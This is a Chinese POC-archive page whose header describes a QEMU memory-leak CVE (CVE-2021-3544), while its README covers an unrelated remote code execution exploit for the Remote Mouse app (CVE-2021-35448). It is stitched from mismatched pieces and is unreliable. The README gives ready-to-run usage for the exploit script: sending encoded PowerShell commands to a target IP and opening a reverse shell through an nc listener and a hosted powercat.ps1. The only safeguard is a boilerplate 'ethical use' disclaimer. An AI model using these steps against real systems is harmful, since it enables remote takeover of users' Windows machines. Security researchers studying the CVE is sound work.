关联漏洞
标题:QEMU 安全漏洞 (CVE-2021-3544)Description:QEMU(Quick Emulator)是法国法布里斯-贝拉(Fabrice Bellard)个人开发者的一套模拟处理器软件。该软件具有速度快、跨平台等特点。 QEMU 存在安全漏洞。该漏洞源于 vhost-user-gpu/vhost-user-gpu.c存在内存泄漏。以下产品及版本受到影响:QEMU: 5.0.0, 5.0.1, 5.1.0, 5.2.0, 6.0.0。
Description
POC for CVE-2021-3544 based on https://www.exploit-db.com/exploits/49601
介绍
# CVE-2021-35448 - Remote Mouse Exploit
## Description
This exploit targets the **CVE-2021-35448** vulnerability in the Remote Mouse application (formerly WiFi Mouse).
# POC
[CVE-2021-35448.webm](https://github.com/user-attachments/assets/2aa1ff4a-31c0-46e2-9abb-8bfb17bede61)
## Usage
### Basic Syntax
```bash
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
```
### Options
- `-t, --target`: Target IP address (required)
- `-p, --payload`: Custom command to execute
- `-r, --reverse`: Reverse shell in IP:PORT format
- `-l, --http`: Local HTTP server in IP:PORT format (required with -r)
### Usage Examples
#### 1. Custom Command
```bash
python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
```
#### 2. Reverse Shell (Recommended)
```bash
# Terminal 1 - Listener
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
```
## Prerequisites
### Required Files
- `CVE-2021-35448.py`: Main exploitation script
- `powercat.ps1`: PowerShell script for reverse shells
### Target System
- Remote Mouse installed and running
- Windows system (tested on Windows 10)
## Warning
⚠️ **ETHICAL USE ONLY** ⚠️
This tool is intended for educational purposes and authorized penetration testing only. Unauthorized use of this exploit is illegal and may result in legal prosecution.
## References
- [WiFi Mouse 1.7.8.5 - Remote Code Execution](https://www.exploit-db.com/exploits/49601)
- [CVE-2021-35448 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-35448)
## Author
Developed for educational and ethical penetration testing purposes.
---
*Last updated: 2025*
文件快照
[4.0K] /data/pocs/3153a55c54c02a4a62ef342606372c2ca1297fcb
├── [3.0K] CVE-2021-35448.py
├── [ 36K] powercat.ps1
└── [1.6K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →